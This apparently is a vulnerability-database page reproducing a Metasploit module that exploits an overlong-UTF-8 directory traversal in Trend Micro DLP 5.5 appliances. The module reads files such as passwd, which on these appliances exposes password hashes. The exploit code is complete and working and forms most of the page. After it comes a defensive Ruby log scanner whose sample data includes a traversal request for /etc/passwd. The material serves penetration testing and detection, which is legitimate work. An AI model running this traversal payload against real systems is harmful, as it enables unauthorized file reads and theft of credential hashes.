
TrendMicro Data Loss Prevention 5.5 Directory Traversal

22 Sep 2011 07:34:53 | Reported by aushack | Type: metasploit | Source: www.rapid7.com

TrendMicro DLP 5.5 Directory Traversal vulnerability test module

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'TrendMicro Data Loss Prevention 5.5 Directory Traversal',
      'Description' => %q{
        This module tests whether a directory traversal vulnerability is present
        in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.
        The vulnerability appears to be actually caused by the Tomcat UTF-8
        bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938.
        This module simply tests for the same bug with Trend Micro specific settings.
        Note that in the Trend Micro appliance, /etc/shadow is not used and therefore
        password hashes are stored and anonymously accessible in the passwd file.
        },
      'References' => [
        [ 'URL', 'http://tomcat.apache.org/' ],
        [ 'OSVDB', '47464' ],
        [ 'OSVDB', '73447' ],
        [ 'CVE', '2008-2938' ],
        [ 'URL', 'http://www.securityfocus.com/archive/1/499926' ],
        [ 'EDB', '17388' ],
        [ 'BID', '48225' ],
      ],
      'Author' => [ 'aushack' ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Jan 9 2009'
    )

    register_options(
      [
        Opt::RPORT(8443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptPath.new('SENSITIVE_FILES', [
          true, 'File containing sensitive files, one per line',
          File.join(Msf::Config.data_directory, 'wordlists', 'sensitive_files.txt')
        ]),
      ]
    )
  end

  def extract_words(wordfile)
    return [] unless wordfile && File.readable?(wordfile)

    begin
      File.readlines(wordfile, chomp: true)
    rescue ::StandardError => e
      elog(e)
      []
    end
  end

  def find_files(files)
    traversal = '/%c0%ae%c0%ae'

    res = send_request_raw(
      {
        'method' => 'GET',
        'uri' => '/dsc/' + traversal * 10 + files # We know depth is 10
      }, 25
    )
    if (res && (res.code == 200))
      print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
      @files_found << files
    elsif (res && res.code)
      vprint_status("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
    end
  end

  def run_host(_ip)
    @files_found = []

    begin
      print_status("Attempting to connect to #{rhost}:#{rport}")
      res = send_request_raw(
        {
          'method' => 'GET',
          'uri' => '/dsc/'
        }, 25
      )

      if res
        extract_words(datastore['SENSITIVE_FILES']).each do |files|
          find_files(files) unless files.empty?
        end
      end

      if !@files_found.empty?
        print_good('File(s) found:')

        @files_found.each do |f|
          print_good(f)
        end
      else
        print_error('No File(s) found')
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    rescue ::Timeout::Error, ::Errno::EPIPE
    end
  end
end
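
A detection-side counterpart to the module above, added here as an example; it is not part of the Metasploit module or the original page. It scans access-log request paths for overlong two-byte UTF-8 encodings (such as the `%c0%ae` the module sends in place of `.`) that decode to a parent-directory segment. The function names are hypothetical and the log lines are constructed samples.

```ruby
# Added example: hypothetical helper names, constructed sample data.
# Percent-decode a URI path into raw bytes without assuming valid UTF-8.
def percent_decode_bytes(path)
  path.b.gsub(/%([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }.bytes
end

# Decode bytes the way a lenient UTF-8 decoder would: a 0xC0/0xC1 lead byte
# plus a continuation byte is an overlong form that aliases an ASCII
# character (0xC0 0xAE => "."). Strict decoders must reject these.
# Returns [decoded_binary_string, overlong_seen].
def lenient_decode(bytes)
  out = []
  overlong = false
  i = 0
  while i < bytes.length
    lead = bytes[i]
    cont = bytes[i + 1]
    if [0xC0, 0xC1].include?(lead) && cont && (cont & 0xC0) == 0x80
      out << (((lead & 0x1F) << 6) | (cont & 0x3F))
      overlong = true
      i += 2
    else
      out << lead
      i += 1
    end
  end
  [out.pack('C*'), overlong]
end

# True when overlong bytes are present AND the decoded path has a ".." segment.
def overlong_traversal?(path)
  decoded, overlong = lenient_decode(percent_decode_bytes(path))
  overlong && decoded.split(%r{[/\\]}).include?('..')
end

# Extract the request path from combined-log-format lines and keep the hits.
def suspicious_requests(log_lines)
  log_lines.filter_map do |line|
    path = line[/"(?:GET|POST|HEAD) (\S+) HTTP/, 1]
    path if path && overlong_traversal?(path)
  end
end

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
  '192.0.2.10 - - [01/Jan/2024:00:00:01 +0000] "GET /dsc/ HTTP/1.1" 200 512',
  '192.0.2.10 - - [01/Jan/2024:00:00:02 +0000] "GET /dsc/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 200 1024',
  '192.0.2.11 - - [01/Jan/2024:00:00:03 +0000] "GET /dsc/caf%c3%a9.html HTTP/1.1" 200 300'
].freeze
puts suspicious_requests(SAMPLE_LOG) if __FILE__ == $PROGRAM_NAME
```

Legitimate multi-byte UTF-8 such as `%c3%a9` is not flagged, and plain `../` traversal is deliberately out of scope because this check targets only the overlong-encoding variant.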
